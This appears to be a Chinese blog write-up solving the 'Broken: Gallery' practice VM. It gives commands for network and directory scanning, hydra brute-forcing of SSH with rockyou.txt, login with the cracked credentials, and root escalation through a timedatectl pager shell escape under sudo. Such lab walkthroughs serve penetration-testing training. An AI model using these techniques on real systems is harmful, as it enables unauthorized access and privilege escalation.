Broken: Gallery靶机复现

CcHKer2024-08-18 16:34

靶机设置

靶机设置为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.142

目录扫描

dirsearch 192.168.112.142

访问浏览器

发现文件页面

查看后发现都没什么用

getshell

hydra -L rockyou.txt -P rockyou.txt 192.168.112.142 ssh

尝试爆破ssh账号密码

爆破成功

账号:broken

密码:broken

远程连接

ssh broken@192.168.112.142

连接成功

提权

sudo -l查看免密操作

尝试sudo提权

sudo timedatectl list-timezones

!/bin/sh

提权成功

相关推荐
嵌入式×边缘AI:打怪升级日志2 小时前
[特殊字符] USBX 学习笔记(基于 Azure® RTOS)
网络
米羊1212 小时前
Linux 内核漏洞提权
网络·安全·web安全
运维行者_3 小时前
2026 技术升级,OpManager 新增 AI 网络拓扑与带宽预测功能
运维·网络·数据库·人工智能·安全·web安全·自动化
Ar呐4 小时前
软考网规篇之局域网——网关冗余技术VRRP
网络·计算机网络
头发还没掉光光4 小时前
HTTP协议从基础到实战全解析
linux·服务器·网络·c++·网络协议·http
漂洋过海的鱼儿4 小时前
设计模式——EIT构型(三)
java·网络·设计模式
数通工程师5 小时前
企业级硬件防火墙基础配置实战:从初始化到规则上线全流程
运维·网络·网络协议·tcp/ip·华为
血色橄榄枝5 小时前
03 基于Flutter集成网络请求On OpenHarmony
网络·flutter
Godspeed Zhao5 小时前
现代智能汽车中的无线技术41——BT与BLE(0)
网络·汽车
那就回到过去5 小时前
PIM-DM断言机制和剪枝否决机制
网络·tcp/ip·智能路由器·ensp
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03Linux下V2Ray安装配置指南04Claude Code Skills 实用使用手册05UV安装并设置国内源06Open Code教程(四)| 高级配置与集成07在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)08MC.JS 网页版《我的世界》 免安装中文版09BongoCat - 跨平台键盘猫动画工具10安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)